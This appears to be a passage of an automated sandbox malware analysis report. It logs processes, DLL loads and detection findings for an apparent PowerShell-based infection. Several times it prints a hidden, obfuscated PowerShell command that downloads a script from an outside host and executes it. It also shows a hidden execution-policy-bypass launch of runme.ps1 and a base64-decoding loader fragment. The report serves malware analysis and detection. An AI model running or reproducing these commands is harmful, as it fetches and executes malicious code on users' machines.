        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2000,i,4887704872573849148,15116561827335116035,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:3
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://flexjjet.com"
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" C:\\Temp\PyEnv\get-pip.py
        Source: C:\Temp\PyEnv\python.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" -m pip install pycryptodome pypiwin32
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2000,i,4887704872573849148,15116561827335116035,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:3Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" C:\\Temp\PyEnv\get-pip.pyJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" -m pip install pycryptodome pypiwin32Jump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: python311.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: version.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: libffi-8.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: libcrypto-3.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: libssl-3.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: python311.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: version.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Temp\PyEnv\python.exeFile opened: C:\Temp\pyvenv.cfgJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_elementtree.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_zoneinfo.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\python.pdb source: python.exe, 00000018.00000000.1975619284.00007FF70C492000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_msi.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5B1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\winsound.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($TFlsgCfG))$obj = ConvertFrom-Json $json$paths = $obj.paths$data = $obj.data$up = Join-Path $Env:AppData 'Y4TFCR'[System.IO.Directory]::CreateDirectory($up) | Out-Nullfor ($i = 0; $i
        Obfuscated command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"Jump to behavior
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1" Jump to behavior
        Source: vcruntime140_1.dll.20.drStatic PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
        Source: cli.exe.24.drStatic PE information: real checksum: 0x0 should be: 0x3aa1
        Source: wheel.exe.24.drStatic PE information: real checksum: 0x2a492 should be: 0x24951
        Source: pip3.11.exe.24.drStatic PE information: real checksum: 0x2a492 should be: 0x22fdc
        Source: cli-arm64.exe.24.drStatic PE information: real checksum: 0x0 should be: 0x79fa
        Source: pip3.exe.24.drStatic PE information: real checksum: 0x2a492 should be: 0x22fdc
        Source: cli-32.exe.24.drStatic PE information: real checksum: 0x0 should be: 0x3aa1
        Source: cli-64.exe.24.drStatic PE information: real checksum: 0x0 should be: 0x5e39
        Source: pip.exe.24.drStatic PE information: real checksum: 0x2a492 should be: 0x22fdc
        Source: python311.dll.20.drStatic PE information: section name: PyRuntim
        Source: vcruntime140.dll.20.drStatic PE information: section name: fothk
        Source: vcruntime140.dll.20.drStatic PE information: section name: _RDATA
        Source: libcrypto-3.dll.20.drStatic PE information: section name: .00cfg
        Source: libssl-3.dll.20.drStatic PE information: section name: .00cfg
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7F744764 push es; retf 19_2_00007FFF7F744767
